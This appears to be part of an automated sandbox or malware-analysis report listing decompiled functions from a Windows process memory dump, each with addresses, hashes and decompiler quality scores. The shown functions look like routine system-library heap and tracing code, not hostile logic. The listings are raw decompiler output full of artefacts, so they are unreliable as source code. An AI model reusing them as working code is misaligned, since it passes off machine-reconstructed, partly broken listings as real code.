                                                      • Instruction Fuzzy Hash: B8218172600119EFD721DF59CC88EABBBBDFF86640F114159FA0597250DB34AE02CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01670050, Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E01670050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x174d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01689ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0169B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01728A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01689702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x174b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                      0x01670055
                                                      0x0167005d
                                                      0x01670062
                                                      0x0167006c
                                                      0x0167006f
                                                      0x01670074
                                                      0x0167007a
                                                      0x0167007a
                                                      0x01670080
                                                      0x01670080
                                                      0x01670087
                                                      0x0167008d
                                                      0x0167008f
                                                      0x01670093
                                                      0x01670095
                                                      0x0167009b
                                                      0x016700f8
                                                      0x016700fb
                                                      0x016700fc
                                                      0x016700ff
                                                      0x01670108
                                                      0x01670108
                                                      0x016700a2
                                                      0x016700a6
                                                      0x016700b3
                                                      0x016700bc
                                                      0x016700c5
                                                      0x016700ca
                                                      0x016bc01e
                                                      0x00000000
                                                      0x00000000
                                                      0x016bc02d
                                                      0x016700d5
                                                      0x016700d9
                                                      0x016bc03d
                                                      0x016bc046
                                                      0x016bc046
                                                      0x016700df
                                                      0x016700e2
                                                      0x016700ea
                                                      0x016700ef
                                                      0x016700f2
                                                      0x016700f6
                                                      0x01670111
                                                      0x01670117
                                                      0x01670117
                                                      0x00000000
                                                      0x016700f6
                                                      0x016700d0
                                                      0x016700d0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a7cf54d5287e0e4930e37460f9062a2be27ee3f87b76032d5e8222e5e786f0a
                                                      • Instruction ID: f5f0232ed37b1854b1f8b2671ec46f1d2b3f1b4af06c1642d58aa90a55081bd0
                                                      • Opcode Fuzzy Hash: 4a7cf54d5287e0e4930e37460f9062a2be27ee3f87b76032d5e8222e5e786f0a
                                                      • Instruction Fuzzy Hash: B6316F31601B04CFD726CF28CC44BA6B7E5FF89724F14456DE59687B90DB75A901CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D6C0A, Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E016D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01677D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1747b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01674620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0169F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01677D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01699AE0();
						_t23 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                      0x016d6c0a
                                                      0x016d6c0f
                                                      0x016d6c10
                                                      0x016d6c13
                                                      0x016d6c15
                                                      0x016d6c19
                                                      0x016d6c1c
                                                      0x016d6c21
                                                      0x016d6c28
                                                      0x016d6c3a
                                                      0x016d6c2a
                                                      0x016d6c33
                                                      0x016d6c33
                                                      0x016d6c3f
                                                      0x016d6c48
                                                      0x016d6c4d
                                                      0x016d6c60
                                                      0x016d6c65
                                                      0x016d6c69
                                                      0x016d6c73
                                                      0x016d6c79
                                                      0x016d6c7f
                                                      0x016d6c86
                                                      0x016d6c90
                                                      0x016d6c94
                                                      0x016d6ca6
                                                      0x016d6cb2
                                                      0x016d6cbd
                                                      0x016d6cbd
                                                      0x016d6cc3
                                                      0x016d6cc7
                                                      0x016d6ccb
                                                      0x016d6cd0
                                                      0x016d6cd1
                                                      0x016d6ce2
                                                      0x016d6ce2
                                                      0x016d6c69
                                                      0x016d6ced

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62402be179a82f539956c2aa5e2627fef2275c00400843d1945be3fe54b4ef41
                                                      • Instruction ID: 7d0aa42fe1aa57c145c438d84a1f03992476149e7e2c59d233f9bb4e6c282b96
                                                      • Opcode Fuzzy Hash: 62402be179a82f539956c2aa5e2627fef2275c00400843d1945be3fe54b4ef41
                                                      • Instruction Fuzzy Hash: 8121ABB2A00645AFD715DB68DC84E2AB7B8FF48700F040069F904C7791E734ED50CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016990AF, Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E016990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E016AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0168E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01674620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0169F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0168A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                      0x016990af
                                                      0x016990b8
                                                      0x016990bb
                                                      0x016990bf
                                                      0x016990c2
                                                      0x016990c2
                                                      0x016990c8
                                                      0x016990cb
                                                      0x016990cd
                                                      0x016d14d7
                                                      0x016d14eb
                                                      0x016d14eb
                                                      0x00000000
                                                      0x016d14eb
                                                      0x016d14db
                                                      0x016d14e6
                                                      0x00000000
                                                      0x016d14f2
                                                      0x016d14e8
                                                      0x00000000
                                                      0x016d14e8
                                                      0x016990d8
                                                      0x016990da
                                                      0x016990dd
                                                      0x016990e5
                                                      0x00000000
                                                      0x01699139
                                                      0x016990fa
                                                      0x016990fe
                                                      0x01699142
                                                      0x00000000
                                                      0x01699142
                                                      0x01699104
                                                      0x01699107
                                                      0x0169910b
                                                      0x01699110
                                                      0x01699118
                                                      0x01699147
                                                      0x01699148
                                                      0x0169914f
                                                      0x01699150
                                                      0x01699151
                                                      0x01699152
                                                      0x01699156
                                                      0x0169915d
                                                      0x01699160
                                                      0x01699168
                                                      0x0169916c
                                                      0x016991bc
                                                      0x016991be
                                                      0x00000000
                                                      0x016991be
                                                      0x0169916e
                                                      0x01699173
                                                      0x01699176
                                                      0x00000000
                                                      0x00000000
                                                      0x0169917c
                                                      0x01699180
                                                      0x016991b5
                                                      0x00000000
                                                      0x016991b5
                                                      0x01699182
                                                      0x01699185
                                                      0x01699189
                                                      0x00000000
                                                      0x00000000
                                                      0x0169918e
                                                      0x01699190
                                                      0x01699198
                                                      0x00000000
                                                      0x00000000
                                                      0x016991a0
                                                      0x00000000
                                                      0x016991ad
                                                      0x016991ad
                                                      0x016991b0
                                                      0x016991b1
                                                      0x00000000
                                                      0x01699185
                                                      0x0169911a
                                                      0x0169911c
                                                      0x0169911f
                                                      0x01699125
                                                      0x01699127
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: fe94f510c7392fffbdcbd21ae36bc59dcf5c2bb2cbe25167e126a2cfe627af2e
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: 31218BB1A00205EFDB21DF69CC44AAAFBF8EB54314F14886EE949A7210D770ED00CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01683B7A, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E01683B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x17484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x17484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0169AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0169FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x17484c4; // 0x0
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                      0x01683b89
                                                      0x01683b96
                                                      0x01683ba1
                                                      0x01683bab
                                                      0x01683bb5
                                                      0x01683bb9
                                                      0x016c6298
                                                      0x01683bbf
                                                      0x01683bc2
                                                      0x01683bc3
                                                      0x01683bc9
                                                      0x01683bca
                                                      0x01683bcc
                                                      0x01683bcd
                                                      0x01683bd4
                                                      0x01683bd6
                                                      0x01683bdb
                                                      0x01683bea
                                                      0x01683bf7
                                                      0x01683bfb
                                                      0x01683bff
                                                      0x01683c09
                                                      0x01683c0a
                                                      0x01683c0b
                                                      0x01683c0f
                                                      0x01683c14
                                                      0x01683c18
                                                      0x01683c18
                                                      0x01683bfb
                                                      0x01683c1b
                                                      0x01683c30
                                                      0x01683c30
                                                      0x01683c3d

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5759a9d49a7fd7fb6755ae96bb9d782b44a802e58f7f13d07a1caf7566ac32f2
                                                      • Instruction ID: 15fc389bf947e669f4f738999f18ad8b11822d8a3e9727fae023015d67efff2d
                                                      • Opcode Fuzzy Hash: 5759a9d49a7fd7fb6755ae96bb9d782b44a802e58f7f13d07a1caf7566ac32f2
                                                      • Instruction Fuzzy Hash: 39219272600109EFC710EF98CD81B6ABBBDFB44718F154169E904AB251D771ED01CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D6CF0, Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E016D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01677D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01677D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1635c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0168F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0168F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E016D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01672400( &_v52);
								}
								_t21 = L01672400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                      0x016d6cfb
                                                      0x016d6d00
                                                      0x016d6d02
                                                      0x016d6d06
                                                      0x016d6d0a
                                                      0x016d6d0e
                                                      0x016d6d19
                                                      0x016d6d2b
                                                      0x016d6d1b
                                                      0x016d6d24
                                                      0x016d6d24
                                                      0x016d6d33
                                                      0x016d6d39
                                                      0x016d6d46
                                                      0x016d6d4f
                                                      0x016d6d61
                                                      0x016d6d51
                                                      0x016d6d5a
                                                      0x016d6d5a
                                                      0x016d6d69
                                                      0x016d6d6b
                                                      0x016d6d6d
                                                      0x016d6d6f
                                                      0x016d6d6f
                                                      0x016d6d74
                                                      0x016d6d79
                                                      0x016d6d7a
                                                      0x016d6d7f
                                                      0x016d6d82
                                                      0x016d6d88
                                                      0x016d6d89
                                                      0x016d6d90
                                                      0x016d6d94
                                                      0x016d6da7
                                                      0x016d6db1
                                                      0x016d6db1
                                                      0x016d6dbb
                                                      0x016d6dbb
                                                      0x016d6d90
                                                      0x016d6d69
                                                      0x016d6d46
                                                      0x016d6dc6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b607d135f84c0d95b9f8f136fa07f451d198b7d4472f15e299c95b9b872de26
                                                      • Instruction ID: e4501524d1f31a3062e9f71bf778254d6c329f78b2dbf4090011f1a7442a7cb6
                                                      • Opcode Fuzzy Hash: 4b607d135f84c0d95b9f8f136fa07f451d198b7d4472f15e299c95b9b872de26
                                                      • Instruction Fuzzy Hash: CD21F2739003459BD321EF68DD44B6BBBECEF95644F04055AFA40C7251E734C989C6A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0172070D, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0172070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E017207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0171AFDE( &_v8,  &_v12);
					E01721293(_t38, _v28, _t60);
					if(E01677D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E017114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                      0x0172071b
                                                      0x01720724
                                                      0x01720734
                                                      0x01720738
                                                      0x0172074b
                                                      0x0172074b
                                                      0x01720753
                                                      0x01720753
                                                      0x01720759
                                                      0x0172075d
                                                      0x01720774
                                                      0x01720779
                                                      0x0172077d
                                                      0x01720789
                                                      0x01720795
                                                      0x017207a7
                                                      0x01720797
                                                      0x017207a0
                                                      0x017207a0
                                                      0x017207af
                                                      0x017207c4
                                                      0x017207cd
                                                      0x017207cd
                                                      0x017207af
                                                      0x017207dc

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: 39f15215bb18dbb01cb5cf58e7f28db6e98c1089866091fc28073fb55ef82df0
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: 0D2104362042109FDB05DF2CC884B6ABBA5EFD4750F048569F9958B385D730D91ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D7794, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E016D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1747b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0169F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01677D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01699AE0();
					_t24 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                      0x016d7799
                                                      0x016d779a
                                                      0x016d779b
                                                      0x016d77a3
                                                      0x016d77ab
                                                      0x016d77ae
                                                      0x016d77b1
                                                      0x016d77b1
                                                      0x016d77bf
                                                      0x016d77c4
                                                      0x016d77c8
                                                      0x016d77ce
                                                      0x016d77d4
                                                      0x016d77e0
                                                      0x016d77e0
                                                      0x016d77d6
                                                      0x016d77d6
                                                      0x016d77de
                                                      0x00000000
                                                      0x00000000
                                                      0x016d77de
                                                      0x016d77e5
                                                      0x016d77f0
                                                      0x016d77f3
                                                      0x016d77f6
                                                      0x016d77fd
                                                      0x016d7800
                                                      0x016d780c
                                                      0x016d7818
                                                      0x016d782b
                                                      0x016d781a
                                                      0x016d7823
                                                      0x016d7823
                                                      0x016d7830
                                                      0x016d7831
                                                      0x016d7838
                                                      0x016d783d
                                                      0x016d783e
                                                      0x016d784f
                                                      0x016d784f
                                                      0x016d785a

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0594c4e1e153b9b0c7421b633e4a20e96185b6df1de1a7c716790387188d4412
                                                      • Instruction ID: c0b55806594dd4fb2a30928b801f18e6acbd4466b993af998bd6b99db9724e8b
                                                      • Opcode Fuzzy Hash: 0594c4e1e153b9b0c7421b633e4a20e96185b6df1de1a7c716790387188d4412
                                                      • Instruction Fuzzy Hash: 1121AE72900604AFC725DF69DC84EABBBA9EF48340F11456DFA0AC7750E734E900CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167AE73, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0167AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01677D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01677D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01677D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01677D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E016D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                      0x0167ae78
                                                      0x0167ae7c
                                                      0x0167ae7e
                                                      0x0167ae81
                                                      0x0167ae86
                                                      0x0167ae8d
                                                      0x016c2691
                                                      0x0167ae93
                                                      0x0167ae93
                                                      0x0167ae93
                                                      0x0167ae98
                                                      0x0167ae9d
                                                      0x016c26a2
                                                      0x016c26b4
                                                      0x016c26a4
                                                      0x016c26ad
                                                      0x016c26ad
                                                      0x016c26b9
                                                      0x00000000
                                                      0x016c26bb
                                                      0x00000000
                                                      0x016c26bb
                                                      0x0167aea3
                                                      0x0167aea3
                                                      0x0167aea3
                                                      0x0167aeaa
                                                      0x016c26c0
                                                      0x016c26c9
                                                      0x016c26c9
                                                      0x0167aeb3
                                                      0x016c26d4
                                                      0x016c26e1
                                                      0x00000000
                                                      0x00000000
                                                      0x016c26e7
                                                      0x016c26ee
                                                      0x016c26f0
                                                      0x016c26f9
                                                      0x016c26f9
                                                      0x016c2702
                                                      0x016c2708
                                                      0x016c2708
                                                      0x016c270b
                                                      0x016c270f
                                                      0x016c2711
                                                      0x016c2711
                                                      0x016c2725
                                                      0x016c2725
                                                      0x00000000
                                                      0x0167aeb9
                                                      0x0167aeb9
                                                      0x0167aebf
                                                      0x0167aebf
                                                      0x0167aeb3

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 95fbbe59fd09c84bd6b98a223619be103e6d8c6f9d6797ca14da034648823dab
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: 5921D432601681DFE7169B69CD58B3577E9EF44A40F1904A8ED048B792E774DC41D6A0
